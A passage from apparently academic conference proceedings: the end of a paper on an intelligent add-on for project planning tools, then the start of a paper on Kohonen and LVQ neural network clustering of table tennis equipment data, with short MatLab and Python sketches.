\forall R_j, f_{kl}^{\tau_i}: \; i_{kj} = \frac{p(R_j / f_{kl}^{\tau_i}) - p(R_j / \bar{f}_{kl}^{\tau_i})}{2\sqrt{p(R_j / f_{kl}^{\tau_i})\,(1 - p(R_j / f_{kl}^{\tau_i}))\,p(R_j / \bar{f}_{kl}^{\tau_i})\,(1 - p(R_j / \bar{f}_{kl}^{\tau_i}))}}.   (4)

2. The influence of all factors is

v_k^{\tau_i} = \sum_j i_{kj},   (5)

where v_k^{\tau_i} is the magnitude of the influence of all factors on the reaction R_j in solving the problem τ_i.
3. The estimate of the probability of choosing the reaction R_j, which corresponds to the magnitude of the influence of all factors, is

\forall R_j: \; p^{\tau_i}(R_j) = 0.5 + \frac{v_k^{\tau_i}}{2\sqrt{(v_k^{\tau_i})^2 + 1}},   (6)

where p^{\tau_i}(R_j) is an estimate of the probability of choosing the reaction R_j when solving the problem τ_i.
4. The estimate of the possibility of choosing the reaction R_j when solving the problem τ_i, provided 0 < p(R_j / f_{kl}^{\tau_i}) < 1, is

\forall R_j: \; u_{ij} = \frac{p^{\tau_i}(R_j) + p(R_j / f_{kl}^{\tau_i}) - 1}{2\sqrt{p^{\tau_i}(R_j)\,(1 - p^{\tau_i}(R_j))\,p(R_j / f_{kl}^{\tau_i})\,(1 - p(R_j / f_{kl}^{\tau_i}))}}.   (7)

2.5 Using the Company's Information Standard for Adaptive Project Planning
In [2], a model for the definition of the planned parameters of new projects using the project management information standard is offered. This model should be integrated into the intelligent add-on by defining the characteristics that affect the parameters of the new project plan. In this model, determining the planned parameters of new projects (q_j)
on the parameters of completed projects is performed based on the use of the following data:
1. Duration of work (q_1). It is based on indicators set by experts (managers and specialists), taking into account the deviation of the actual duration from the planned one (set by the same experts) in previous projects. For example, if the actual duration of work in previous projects exceeded the planned duration set by the same expert by 50%, and in the current project the expert predicts that the work will be performed in 20 days, it should be expected that the work will be performed in 30 days (50% longer). In addition, the duration of work can be determined on the basis of the actual duration of the same work in previous projects, taking into account the work efforts. If in a previous project the work on the installation of 2 lathes was performed in 20 days, then in the new project it is necessary to allocate 10 days for the installation of 1 lathe.
2. The need for resources (q_2). As with the duration of work, it is determined on the basis of indicators set by experts, with adjustment for the scope of work and taking into account the "inaccuracy" of the experts in previous projects.
3. Procurement of material resources (q_3). It is determined on the basis of indicators set by experts in the current project, taking into account the deviation of the actual delivery dates from the planned ones for the same suppliers, as set by the same experts in the past.
4. Risk assessment (q_4). It is performed on the basis of expert assessment, adjusted for the deviation of the risk assessments in previous projects from the actual costs and influence on the project.
To determine the influence of the parameters of the information standard on the planned indicators of the current project, a random function with normal distribution is used:

p_{ji} = \frac{1}{\sigma_j \sqrt{2\pi}} \, e^{-\frac{(x_{ji} - \mu_j)^2}{2\sigma_j^2}},   (8)

where p_{ji} is the estimate of the probability of accepting the value x_{ji} for the parameter q_j from the company's information standard; μ_j is the mathematical expectation of the parameter q_j; σ_j is the standard deviation of the parameter q_j. The values of the mathematical expectation and the standard deviation in formula (8) are obtained from the set of values of the parameter q_j in the company's information standard. In the process of using the company's information standard in the intelligent add-on, for each value x_{ji} (formula (8)) of the listed parameters of the project plan, an assessment of its choice is calculated (by formulas (4)–(7)). This takes into account the influences of the documentation and the management team (see Sect. 2.4).
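To make the chain of estimates concrete, here is a minimal MatLab sketch, assuming illustrative probability values for one factor and three candidate reactions; it is not the authors' implementation, and the formulas follow the reconstructions of (4)–(8) given above.

% Sketch of the modified reflex estimates (4)-(7) for one factor and three
% reactions; p_f(j) = p(Rj/f) and p_nf(j) = p(Rj/~f) are assumed to have
% been estimated beforehand from previous projects (values illustrative).
p_f  = [0.70 0.20 0.10];                      % p(Rj/f), factor present
p_nf = [0.40 0.35 0.25];                      % p(Rj/~f), factor absent
i_kj  = (p_f - p_nf) ./ ...
        (2 * sqrt(p_f .* (1 - p_f) .* p_nf .* (1 - p_nf)));   % formula (4)
v     = i_kj;                                 % formula (5), one factor here
p_tau = 0.5 + v ./ (2 * sqrt(v.^2 + 1));      % formula (6)
u     = (p_tau + p_f - 1) ./ ...
        (2 * sqrt(p_tau .* (1 - p_tau) .* p_f .* (1 - p_f))); % formula (7)
[~, jbest] = max(u);                          % decisive rule (2)
% Weighting a candidate parameter value by the normal density (8),
% with an illustrative duration distribution from the information standard:
mu = 20; sigma = 4; x = 24;
p_x = exp(-(x - mu)^2 / (2 * sigma^2)) / (sigma * sqrt(2 * pi));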
3 Experiments
The developed concept and means of the intelligent add-on have passed experimental testing on real projects and have shown their effectiveness in the project planning process [2, 16]. Experimental studies have been conducted in accordance with the components of such an add-on in two directions – maintaining the company's information standard [2] and processing natural language information in project planning tasks [16].
Experimental studies of the natural language information processing technology in project planning tasks were conducted on real projects by deliberately distorting the incoming natural language information in order to assess the effectiveness of the intelligent add-on under real conditions associated with the inaccuracy, incompleteness and variability of the information received by such planning systems. This made it possible to test the proposed concept in practice and identify ways to create an instrumental intelligent add-on over the means of project management [16]. The research was conducted on 2 developer projects. The duration of one was 540 days, of the other 160 days. The projects contained 1,221 works and about 1,000 links. Resources were used in 919 works. In the experiment, about 3,300 requests were used for the formation of the project plan. The requests for the projects were directed to: creating a project, creating works, creating resources, establishing links between works, distributing resources over works, and setting their parameters: determining the duration of works, the number of resources, and the lead/lag time of works. The probability of a correct system response reached 0.97. The PrimaDoc system for the construction and use of the project management information standard in project-oriented companies, set up according to this concept, was implemented at PAT Tutkovsky. The system was used to create an information standard for geophysical instrumentation projects. Documentation was submitted which included descriptions of devices and manufacturing technologies. In addition, information was entered regarding the manufacturing process itself: the duration of individual stages and the number of resources used. In essence, the information standard of project activities for the manufacture of geophysical instruments was formed [2].
4 Results
The principles and tasks of intellectualization of the project planning process have been formulated. The structure of the intelligent project planning technology has been developed, and the tools for its realization have been offered. This makes it possible to achieve the goal of the study: to create a concept of an intelligent add-on over project planning tools. The concept has been tested in experimental research and practical implementation in Ukrainian enterprises. Within the framework of the experimental research, 2 projects were used, in which the names of the works were more than 90% unique, and the names of the resources were generally different. In total, the project schedules contained 1,221 tasks (LC contained 257 works, and BC – 964 works) with about 1,000 connections. Resources were used in 919 tasks. Incoming project requests included creating a project, tasks and a resource list, linking work, allocating resources to work, and setting numerical parameters (duration of work, amount of resource, lag of work), in total about 3,300 commands. Experimental studies have shown the high efficiency of recognizing the content of natural language appeals. The probability of correctly determining the substantive scenario in the control sample, which included parts of the two projects, reached 92.68% [16]. The practical implementation of the PrimaDoc system for creating and using the project management information standard in the project-oriented company PAT Tutkovsky showed that, for a project implementation of 6 months, the traditional approach required about 200 h to archive information relevant for future projects. When using the PrimaDoc system,
the time spent was as follows: formation of the structure of the information standard of project management and of templates for entering information into the information system, about 10 h; introduction of commands for entering information into the information standard of project management, about 40 h (0.25 h per day) [2]. The results of experimental research and practical implementation have shown that the developed concept allows, at lower cost and with greater accuracy, to use the information resources of companies to develop realistic project plans. The main scientific result of the research is that a new approach to the creation of intelligent project planning systems is proposed. It consists in the development of an intellectual add-on over the instrumental software tools of project management, which takes over a number of functions of the project manager. On this basis, a two-component structure of project planning information technology is proposed. A new scientific result is also the modified reflex method of constructing intelligent systems. Unlike previous implementations, it takes into account the simultaneous influence of 3 groups of factors that have a different informational nature. The high efficiency of project planning problem solving, demonstrated in experimental studies, opens wide prospects for the application of the reflexive approach to the creation of intelligent systems in digital project management. Expanding the scope of application of reflexive intelligent systems in project management will make it possible to solve most of the management tasks that project managers solve today, and to solve them better. This, in turn, opens the way to digital project management.
5 Discussion
These results achieve the goal of the study, namely to create the concept of an intelligent add-on over the tools of project planning. The limitations inherent in this study are related to the narrow scope of the concept, which covers only project planning tasks. A shortcoming of the study is that it is based on information-probabilistic methods of estimating input information, forecasting the status of the project and making rational decisions on the order of works, their duration and resource content, while methods of building expert systems, in particular knowledge bases, are not used. On the other hand, this approach makes it possible to create effective intelligent systems capable of reacting to informational influences of various natures and independently adapting to changes in incoming information, whereas the use of knowledge bases requires the participation of an expert. In addition, the labor-intensiveness of creating reflective intelligent systems is an order of magnitude less than that of creating expert systems, with a sufficiently high efficiency of solving intellectual problems. Furthermore, the proposed concept only supplements project management systems with intelligent add-ons and does not offer new methods of project planning, although it makes it possible to solve the scientific and practical problem of forming timely, reliable and complete information for project planning, not only from the documentation but also from expert assessments of its parameters and from the experience of planning and implementing previous projects. Despite these limitations and shortcomings, the developed concept has successfully passed experimental and practical testing.
6 Conclusions
Research was conducted on the creation of the concept of an intelligent add-on to project management software tools, which required the use of: project management methods, to design tasks for the development, alignment and approval of the project plan; the critical path method, for the development and calculation of the CNS; information technology methods, to gather information for plan development; and methods of data mining, to analyze the information for developing the project plan. In addition, an intelligent interface was created for teams to interact with project planning tools, using computational linguistics. The basis for decision-making in the intelligent add-on modules that implement these functions is the modified reflex method, which makes it possible, on the basis of information accumulated in previous projects and expert knowledge, to assess the impact of various factors on the structure and parameters of the project plan. All this has become the foundation for a new scientific result, the essence of which is the development of the methodology and technology of project management by creating a new concept of an intelligent add-on to project management software, which includes the principles, approach, structure, model and tools of project planning. The obtained result differs from the existing ones in that it makes it possible to intellectualize the project planning process and use tools that produce effective decisions on the structure and parameters of project work, which reduces the probability of non-implementation of and changes to approved plans. In fact, the concept of the intelligent add-on has combined the approach, principles, models, methods and tools of project planning into one conceptual, methodological, technological and information space. The value of the proposed concept is that it can be used to improve existing project management systems based on modern information technology. This makes it possible to apply the principles, approach, structures and technologies offered in the concept in companies of other countries of the world which use project management software tools (in particular MS Project), and not only in Ukraine.
References
1. Teslia, I., Kubyavka, L., Yegorchenkov, O., Yegorchenkova, N.: Software and information add-ons in the management of portfolios of projects and programs. Sci. Collect.: Inf. Processes Technol. Syst. Transp. 1, 11–24 (2014)
2. Teslia, I., Yegorchenkova, N., Yegorchenkov, O., Khlevna, I., Kataieva, Y., et al.: Development of the concept of construction of the project management information standard on the basis of the PrimaDoc information management system. East.-Eur. J. Adv. Technol. 1/3(115), 53–65 (2022)
3. Hildebrand, C., Efthymiou, F., Busquet, F., Hampton, W., Hoffman, D., Novak, T.: Voice analytics in business research: conceptual foundations, acoustic feature extraction, and applications. J. Bus. Res. 121, 364–374 (2020). https://doi.org/10.1016/j.jbusres.2020.09.020
4. Cui, Zh., Gong, H., Wang, Ya., Shen, Ch., Zou, W., Luo, Sh.: Enhancing interactions for in-car voice user interface with gestural input on the steering wheel. In: 13th International Conference on Automotive User Interfaces and Interactive Vehicular Applications, pp. 59–68 (2021). https://doi.org/10.1145/3409118.3475126
5. Long, Yi., Peng, Ya.: Development and validation of a robotic system combining mobile wheelchair and lower extremity exoskeleton. J. Intell. Robot. Syst. 104, 5 (2022). https://doi.org/10.1007/s10846-021-01550-8
6. Ng, S.-C., et al.: An intelligent mobile application for assisting visually impaired in daily consumption based on machine learning with assistive technology. Int. J. Artif. Intell. Tools 30(01), 2140002 (2021). https://doi.org/10.1142/S0218213021400029
7. Birch, B., Griffiths, C., Morgan, A.: Environmental effects on reliability and accuracy of MFCC based voice recognition for industrial human-robot-interaction. Proc. Inst. Mech. Eng. Part B: J. Eng. Manuf. 235(12), 1939–1948 (2021). https://doi.org/10.1177/09544054211014492
8. Al-Amri, R., Murugesan, R.K., Alshari, E.M., Alhadawi, H.S.: Toward a full exploitation of IoT in smart cities: a review of IoT anomaly detection techniques. In: Proceedings of International Conference on Emerging Technologies and Intelligent Systems (ICETIS), pp. 193–214 (2021). https://doi.org/10.1016/j.scs.2017.12.034
9. Khaled, M.A.M.: Applications of artificial intelligence in project management. Rel. Alberto De Marco, Filippo Maria Ottaviani. Politecnico di Torino, Corso di laurea magistrale in Ingegneria Gestionale (Engineering and Management) (2021). https://webthesis.biblio.polito.it/18431/
10. Morozov, V., Mezentseva, O.: Development of optimization models of complex infocommunication projects based on data mining. In: IEEE International Conference on Smart Information Systems and Technologies (SIST), pp. 1–7 (2021). https://doi.org/10.1109/SIST50301.2021.9465991
11. Kovtunenko, Y.V.: Application of artificial intelligence in the enterprise management system: problems and advantages. Econ. J. Odessa Polytech. Univ. 2(8), 93–99 (2019). https://doi.org/10.5281/zenodo.4171114, https://economics.opu.ua/ejopu/2019/No2/93.pdf
12. Kapliński, O., Zavadskas, E.: Expert systems for construction processes. Statyba 3(12), 49–61 (1997). https://doi.org/10.1080/13921525.1997.10531367
13. Starukh, A.I.: Application of expert systems in the business environment. Scientific Bulletin of the International Humanities University, pp. 114–121 (2020). http://www.vestnik-econom.mgu.od.ua/journal/2020/41-2020/17.pdf
14. Shorikov, A.F.: Expert system of investment design. Appl. Inform. 5(47), 96–104 (2013)
15. Shorikov, A.F.: Technology for the development of a computer expert system for business planning. Bull. Perm Sci. Cent. 2, 78–82 (2016)
16. Teslia, I., Yehorchenkova, N., Khlevna, I., Yehorchenkov, O., Kataieva, Y., Klevanna, G.: Development of reflex technology of action identification in project planning systems. In: International Conference on Smart Information Systems and Technologies, Nur-Sultan (2022). https://sist.astanait.edu.kz/
17. Teslia, I., et al.: Method development of coordination of design and operational activities in the process of manufacturing complex scientific computer products. East. Eur. J. Adv. Technol. 6(114), 83–92 (2021)
18. Teslia, I., Pylypenko, V., Popovych, N., Chornyy, O.: The non-force interaction theory for reflex system creation with application to TV voice control. In: 6th International Conference on Agents and Artificial Intelligence, LERIA, France, pp. 288–296 (2014)
19. Ryzhakova, G., Chupryna, K., Ivakhnenko, I., Derkach, A., Huliaiev, D.: Expert-analytical model of management quality assessment at a construction enterprise. Sci. J. Astana IT Univ. 3, 71–82 (2020). https://doi.org/10.37943/AITU.2020.69.95.007
Self-organization of the Table Tennis Market Information Bank Based on Neural Networks Valeriy Tazetdinov(B) , Svitlana Sysoienko, and Mykola Khrulov Cherkasy State Technological University, Cherkasy, Ukraine [email protected], [email protected]
Abstract. The tasks to be solved by the information-analytical system for the selection of table tennis equipment are set. The information bank contains information about the properties of rubbers and blades, as well as known combinations of rubbers and blades. Procedures for classifying the input information on table tennis equipment, which allow the least significant factors to be removed from the database, are proposed, and the corresponding algorithms are given. A method of analytical information processing, which produces the list of table tennis equipment that the player needs, is developed. It makes it possible to forecast the development trends of the table tennis equipment market, for manufacturers to plan and change the structure of production, and for buyers (players) and sellers to fully meet their information needs. A method for self-organization of the information bank based on the result of solving the clustering problem, which is obtained using a Kohonen self-organizing network, is developed. Keywords: Neural network · Self-organization · Clustering · Neural network system · Information bank
1 Introduction
Modern trends in the table tennis market are due to a number of reasons determined by the behavior of its subjects. Nowadays, there is a great variety of equipment for table tennis. According to [1, 2], more than 100 manufacturers of table tennis blades are represented on the market [3], and there are more than 80 manufacturers of table tennis rubbers. Each manufacturer has its own model range, which can include 74 rubbers and more than 300 blades (in the case of Butterfly). With such a variety of table tennis equipment, the selection of a blade and rubbers becomes a very difficult task for a player. As practice shows, most players are not able to successfully formulate equipment requirements. In practice, players can evaluate equipment only after its practical use, based on their own feelings and playing experience [4]. At the same time, there is a rapid growth of modern innovative technologies and their application in everyday life, and automation of all spheres of human activity. In such conditions, the correct selection of a combination of rubbers and a blade acquires special value [5]. The creation of information banks, which will contain data on table tennis equipment, both on sale and already sold out or withdrawn from production, will identify the
equipment that is most in demand and best suited for the buyer in terms of price and quality, justify its value, and identify trends in the table tennis market. The methods of analytical data processing will simplify the choice of the necessary equipment for buyers (players) and improve the quality of service. Ukrainian and foreign scientists have achieved significant results in solving the problems of analyzing complex systems, such as the table tennis market, as well as in selecting the necessary table tennis equipment and future scenarios for table tennis market development. In particular, the works of V.M. Glushkov, M.Z. Zgurovsky, T. Kohonen, T. Saaty, D. Cowan and J.A. Hertz [6] develop models and methods for the identification of processes in dynamical systems. The analysis of the wide range of tasks solved by the subjects of the table tennis market, the complexity of the process of choosing the right equipment, and the influence of environment dynamics on both objective and subjective processes indicate the need for a conceptual restructuring of information services and analytical support. The aim of the work is to develop a method of information-analytical processing which allows insignificant factors to be removed from the information bank.
2 Problem Statement
It is known that the information base is a vector of fields X = (X_1, X_2, ..., X_n), which are the main factors influencing the playing properties of the bat. For rubbers, X_1, X_2, ..., X_n may be such parameters as speed, spin, control, sponge hardness and type of sponge; for blades, they may be the delay of the ball on the surface of the bat, the sweet spot, the number of layers, speed, control, etc. We will consider that, after certain transformations and consolidation of the qualitative information, all factors are represented by numerical values. As a result of this type of formalization, the entropy of the encoded data will be maximized. It is known that, of all statistical distribution functions, the uniform distribution has the largest entropy. That is why, after normalization, the data must evenly fill a unit interval. With this method of modification, all factors will carry the same information load. Thus, the first task, identifying the dependence of the parameter Z, which takes into account speed, spin and control, as an output characteristic of the input factors, is formally to determine the function

Z = F(X_1, X_2, ..., X_n).   (1)
The least squares method, methods of model self-organization (with the group method of data handling as a typical representative), trend analysis and approximation by Fourier series are known approaches to solving such problems. The second task is the problem of determining the sensitivity coefficients of the parameter Z, which takes into account speed, spin and control, that is, determining

f_k = \frac{\partial Z}{\partial X_k}, \quad b_k = \frac{f_k \bar{X}_k}{\bar{Z}}, \quad k = 1, ..., n,   (2)
where f_k is the absolute sensitivity coefficient; b_k is the relative sensitivity coefficient; \bar{X}_k, \bar{Z} are the average values of the k-th factor and of the output characteristic, respectively, for a certain class of table tennis equipment, which is determined by an expert. The features of problems (1)–(2) are: a significant number of input factors (about 20 on average), the presence of noise effects in the initial data, the presence of non-trivial relationships between the output characteristic and the composition of input factors, and the need for preprocessing of the initial data. Solving problems (1)–(2) is necessary for the development of information-analytical support of processes in the table tennis market and will make it possible to analyze its condition and greatly simplify the selection of table tennis equipment.
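A minimal sketch of how problems (1)–(2) can be approached with the least squares method named above: fit a linear model Z = F(X_1, ..., X_n) and evaluate the sensitivity coefficients (2) numerically at the average factor values. The synthetic data and the linear form of F are assumptions for illustration, not the authors' implementation.

% Sketch: least-squares fit of Z = F(X1,...,Xn) on an assumed linear model
% and numerical sensitivity coefficients (2); X, Z are illustrative data.
m = 50; n = 5;
X = rand(m, n);                                    % m items, n factors
Z = X * [2; -1; 0.5; 0; 3] + 0.1 * randn(m, 1);    % synthetic responses
beta = [ones(m, 1) X] \ Z;                         % least-squares fit
F  = @(x) [1, x] * beta;                           % fitted model F
x0 = mean(X, 1); Z0 = F(x0);                       % average values
h  = 1e-6;                                         % finite-difference step
f  = zeros(1, n); b = zeros(1, n);
for k = 1:n
    xk = x0; xk(k) = xk(k) + h;
    f(k) = (F(xk) - Z0) / h;                       % absolute sensitivity
    b(k) = f(k) * x0(k) / Z0;                      % relative sensitivity (2)
end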
3 Information Bank Optimization
Self-organization of the information bank [7] consists in identifying uninformative, insignificant factors and removing them. It is performed using neural network technologies. To do this, we solve the clustering problem [8], which consists in defining groups (clusters) of input vectors that have certain common properties. The biggest advantages of neural networks [9] include their flexible structure. Studying modern developments in the field of information technology, we see that there is a large number of algorithms designed for specific criteria and requirements. The input vectors include the input factors and the output characteristic, which in our problem look as follows: (X_1, X_2, ..., X_n, Z). The clustering task [10] plays an important role in the selection of table tennis equipment. This task looks as follows. Let ϑ_i, i = 1, ..., m, be the pieces of equipment (blades, rubbers) contained in the data bank. Each piece of equipment is characterized by a set of parameters X_{1i}, X_{2i}, ..., X_{ni}. The table tennis expert sets the number of clusters K empirically; as a rule, K ∈ {3, 4, 5, 6, 7}. To create groups with common properties, the input data set must be reduced to a dimensionless form. Since in subsequent studies we are not going to investigate pieces of equipment with extreme values of parameters, i.e., there is no ϑ_i, i = 1, ..., m, and j ∈ {1, 2, ..., n} such that X_{ij} ∉ θ_j, where θ_j is the set of admissible values of the j-th factor, the normalization formula is as follows:
X' = \frac{X - X_{min}}{X_{max} - X_{min}}.   (3)
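Assuming the information bank is stored as an m-by-n matrix X (one row per piece of equipment, one column per factor), normalization (3) can be applied column-wise in MatLab as follows; the layout is an assumption for illustration.

% Column-wise min-max normalization (3); X is an assumed m-by-n matrix
% with one row per piece of equipment and one column per factor.
Xmin = min(X, [], 1);               % per-factor minima
Xmax = max(X, [], 1);               % per-factor maxima
Xn = (X - Xmin) ./ (Xmax - Xmin);   % every factor now fills [0, 1]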
It is also possible that the normalization law is one of the following:

X' = \frac{X - m}{\sigma}, \quad X' = \frac{1}{1 + e^{-X}},   (4)

where m is the arithmetic mean and σ is the standard deviation. In some cases the normalization is performed using a composition of two transformations. Clustering at a fixed value is shown in Fig. 1. We suppose that the task has no general restrictions and that X_j ∈ θ_j = [0, 1], j = 1, ..., n. A cluster is a set of objects ω such that the mean square of the
Fig. 1. Clustering at a fixed value
intragroup distance to the center of the group is less than the mean distance to the common center of the input set of objects, i.e. d_ω^2 < σ^2, where

d_\omega^2 = \frac{1}{N}\sum_{X_i \in \omega}(X_i - X_\omega)^2, \quad X_\omega = \frac{1}{N}\sum_{X_i \in \omega} X_i.   (5)
The solution of the clustering problem is to determine the mapping ϕ(i) that assigns a group number to each index:

\min \sum_{i=1}^{m} \sum_{j>i}^{m} \left\| \vartheta_i^{\varphi(i)} - \vartheta_j^{\varphi(j)} \right\|.   (6)

Define a benchmark bat as a bat with a set of characteristics that forms an idea of the average object in the information bank. For example, it may be a Butterfly Viscaria blade with Butterfly Tenergy 05 rubbers for an offensive style of play. Assuming that one of the factors has a fixed value, the standard is the bat with the best playing properties in a particular cluster. If the number of clusters is K, and the standards X_e^i, i = 1, ..., K, in each cluster Q_1, Q_2, ..., Q_K and the criterion functions are considered, the classes of table tennis equipment are determined automatically. If the preliminary analysis establishes that items with a fixed value of the factor are in the greatest demand, then it is necessary to solve the classification problem, which is formulated as follows: find

\min_{X_e} \sum_{i=1}^{K} d_i,   (7)
where d_i is the distance between a piece of equipment of the i-th class and the corresponding standard, and

d_i = \left( \sum_{j=1}^{m_K} \left( X_j - X_e^i \right)^2 \right)^{1/2},   (8)
where X_e^i is the coordinate of the standard in the i-th class. Obtaining its solution determines the classification of table tennis equipment. Formally, one cluster includes images whose pairwise distances are not more than some positive number. The images of such a cluster belong to a hypersphere (Fig. 2).
Fig. 2. Image clustering
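In code, the classification by formulas (7)–(8) reduces to assigning each item to the class of the nearest standard. A sketch, assuming the normalized items form the rows of Xn and the K standards form the rows of Xe (both are assumed to be given):

% Assign each normalized item (row of Xn) to the nearest of the K class
% standards (rows of Xe), i.e. minimize the distances (8) per item.
m = size(Xn, 1);
cls = zeros(m, 1);
for i = 1:m
    d = sqrt(sum((Xe - Xn(i, :)).^2, 2));  % distances (8) to all standards
    [~, cls(i)] = min(d);                  % the nearest standard wins
end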
However, the values of insignificant factors may go beyond the hypersphere along one or more axes, as they will not affect the belonging of the image to the class. Identifying such factors and removing them from the information bank will reduce the presence of noise effects in solving problems (1)–(2), reduce the training time of the neural network and increase the accuracy of identification. One of the main features that should be taken into account when developing models and methods for analyzing the table tennis market is the variety of factors and the high cardinality of their value sets. Modeling based on the use of artificial neural networks is invariant to such features of the information bank; its result will not be expressed by dependence (1) in an analytical form, but it will allow solving the problems of analysis and selection of table tennis equipment. Using an artificial neural network for identification, the researcher is not limited by any conditions that are inherent in other analytical methods. To solve clustering problems, the Kohonen network is most often used, or one of its variants, the Kohonen self-organizing map. As a result of training the Kohonen network, a set of maps is built, each of which is a two-dimensional grid of nodes placed in a multidimensional space. The task of its training is to adjust the weights in such a way that the same neuron is activated for similar input vectors. The weighting coefficients are adjusted by an iterative algorithm, in which various heuristic techniques are used for adequate training, allowing a stable and suboptimal solution to be obtained in a minimum number of iterations.
The algorithms of the Kohonen network learning technology include procedures for the correct distribution of kernel density using the convex combination method, artificial reduction of the activity of winning neurons, and redistribution of weight values among neurons in a certain neighborhood. As a result of using the Kohonen network, the objects of research are divided into classes. The basis of such a division is the vectors of the values of the objects' parameters; when solving our problem, these will be the values of the internal factors that characterize the table tennis equipment. The disadvantages of the Kohonen network include the implicit definition of class centers and problems with the convergence of the iterative process. The advantage is the absence of any restrictions on its application and the ease of use of the trained network. Taking into account the above, we use the Kohonen network [10] (Fig. 3) for clustering. The following elements are used in the network architecture: P is the input vector; TDL is a tapped delay line; IW is the input weight matrix; b is the neuron bias; C is the competitive transfer function; a is the output vector.
Fig. 3. Architecture and functions of Kohonen network
The Kohonen network is named after the Finnish scientist Teuvo Kohonen. It implements the principle of unsupervised learning [11], and the result of its operation is the formation of classes and the assignment of the studied images to them. Network training is based on the characteristics of reference samples of rackets. The Butterfly Viscaria blade with Butterfly Tenergy 05 rubbers can be used as a reference sample for the attacking game. The values of the bat characteristics are formed on the basis of user feedback [1, 2] and expert assessments. The result of training is the formation of a list of equipment with properties close to the reference sample. The algorithm for creating, training and simulating the network in MatLab is as follows:

net = newc(pr, s, klr);         % create a competitive (Kohonen) layer
net.trainParam.epochs = 3000;   % number of training cycles
net = train(net, p);            % train on the table of initial data
a = sim(net, p);                % simulate the trained network
ac = vec2ind(a);                % class numbers of the input images
The Kohonen network is a single-layer network [11]. It is created by the function newc(pr, s, klr), where pr is the matrix of minimum and maximum elements of the input vectors, s is the number of clusters (neurons), and klr is the learning rate. Network training is carried out by the function train(net, p), where p is the table of initial data; the number of training cycles is 3,000. Simulation of the network [12] after training is performed by the functions a = sim(net, p) and ac = vec2ind(a); the elements of the vector ac contain the class numbers of the input images. The architecture of the system and the functions used in the construction of the Kohonen network [13] are shown in Fig. 3. Its training consists in adjusting the weights in a certain way. The following functions are used: negdist computes the negative Euclidean distance between the weights and the input image; netsum computes the activation; compet identifies the neuron that has "won". Assume that the number of input images is m and the number of clusters is k. As a result of simulation we obtain a vector (q_1, q_2, ..., q_m), where q_i ∈ {1, 2, ..., k}, i = 1, ..., m, is the number of the cluster to which the i-th input image belongs. Obviously, the number of clusters must be at least two. In our task, it will also not exceed the number of input factors, n + 1. If a factor is insignificant, then, regardless of the number of clusters, it will not affect the belonging of an image to a particular cluster. To check the significance of the factors X_1, X_2, ..., X_n, it is necessary to run the algorithm above on the table of initial images p for different values of s. Each image will be assigned a number (class number), that is, the following mapping is performed:
$P_i \to K_i^{j}, \quad i = \overline{1, m}, \; j = \overline{2, n + 1},$  (9)
where i is the image number and j is the number of clusters. Next we find the correlation matrix $R = (r_{ij})_{i,j=1}^{2n+1}$ of the following vectors: $X_1, X_2, \ldots, X_n, Z, K^2, K^3, \ldots, K^{n+1}$. Of the entire matrix R, only the elements $r_{ij}$, $i > n + 1$, $j \le n + 1$, will be needed for further analysis. Find the sums of their absolute values in the columns:

$S_j = \sum_{i=n+2}^{2n+1} |r_{ij}|, \quad j = \overline{1, n + 1}.$  (10)
To form a vector of significant factors, it is necessary to specify some positive number $C \in \left[\min_j S_j,\ \max_j S_j\right]$ and remove all factors whose corresponding values $S_j < C$. The accuracy that is lost as a result of this procedure is compensated by an increase in the learning speed of the neural network and a reduction in noise effects. Thus, the
definition of the vector of significant input factors completes the first stage of self-organization of the information bank of table tennis equipment. The next step is to identify those images that should be considered by buyers (players). Given that the information bank contains a significant number of records, and that, despite the removal of insignificant factors, the number of remaining factors is several dozen, the search for the necessary information would take a long time. We establish that the information on table tennis equipment (blades and rubbers) contained in the information bank belongs to two classes: the first contains equipment the player would like to buy, the second contains equipment that does not interest him. We offer the following procedure for classification and determination of the required equipment. From the entire general set of equipment data, we randomly select a set of representatives. If a piece of equipment is of interest to the client, we assign it to the first class; if not, to the second class. Note that the set of representatives must be representative; otherwise the accuracy of the classification may be low. Using this procedure and the class information, we perform the neural network learning procedure, which in MatLab is as follows: net = newlvq(pr, s1, lr), P = [p1 p2 ... ph], Tc = [2 1 ... 2], net.trainParam.epochs = 1000, net.trainParam.lr = 0.05, net = train(net, P, ind2vec(Tc)), a = sim(net, P). The function newlvq creates an LVQ (Learning Vector Quantization) network [14] for the classification of input vectors. As a rule, such a network performs clustering and classification [15] of input vectors and is a development of self-organizing Kohonen networks. The parameter pr is an array of minimum and maximum values of the input vectors, s1 is the number of neurons in the competing layer, lr is the tuning speed factor, P is the vector of representatives, and Tc is the vector of ones and twos that determines whether or not each representative belongs to the desired class. Network learning [16] is done using the function train. The LVQ network has two layers: a competing one and a linear one. As a result of training, the weights are adjusted so that the representatives correspond to their classes. After the network has learned [17], it is easy to make sure that it performs the classification correctly. To do this, it is enough to specify the following
commands: Y = sim(net, P), Yc = vec2ind(Y). The result of their execution should be a vector Yc that coincides with the vector Tc. After checking that the classification is correct, the network can be used to determine whether a piece of table tennis equipment (blade or rubbers) belongs to the appropriate class. This operation corresponds to the execution of the sequence of commands: P1 = p1, Y1 = sim(net, P1), Y1c = vec2ind(Y1), where P1 is the control image. Given that the values of the factors containing information about all the items of equipment placed in the information bank [19] can be fed sequentially to the input of the neural network [18], and the output value will indicate whether a piece of equipment belongs to the desired class, the classification problem is completely solved. A feature of the selection of table tennis equipment is that the buyer (player) pays attention to certain factors that he considers important. Other factors often go unnoticed. The determining factors are speed, spin, control, the delay time of the ball on the racket, the design of the blade, and others. Therefore, when forming a set of acceptable equipment options, buyers often focus on the value of one input factor, which serves as an index. The object is then selected from this set according to the optimal composition of the other factors. The method proposed above makes it possible to optimize this procedure in time. Its practical application in real problems is possible when using information-analytical systems focused on a specific database with developed algorithms for the operation of the networks under consideration.
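To make the classification step concrete outside MatLab, the following Python/NumPy sketch implements a basic LVQ1 training loop. It is an illustration of the general LVQ idea referenced above, not the authors' implementation; all function names, data shapes, and hyperparameter values are assumptions.

```python
import numpy as np

def train_lvq1(X, y, protos_per_class=2, lr=0.05, epochs=1000, seed=0):
    """Basic LVQ1: pull the nearest prototype toward same-class samples,
    push it away from samples of the other class."""
    rng = np.random.default_rng(seed)
    X, y = np.asarray(X, dtype=float), np.asarray(y)
    prototypes, proto_labels = [], []
    for c in np.unique(y):
        idx = rng.choice(np.flatnonzero(y == c), protos_per_class, replace=False)
        prototypes.append(X[idx])
        proto_labels.extend([c] * protos_per_class)
    W, Wy = np.vstack(prototypes), np.array(proto_labels)
    for _ in range(epochs):
        for i in rng.permutation(len(X)):
            k = np.argmin(((W - X[i]) ** 2).sum(axis=1))  # nearest prototype
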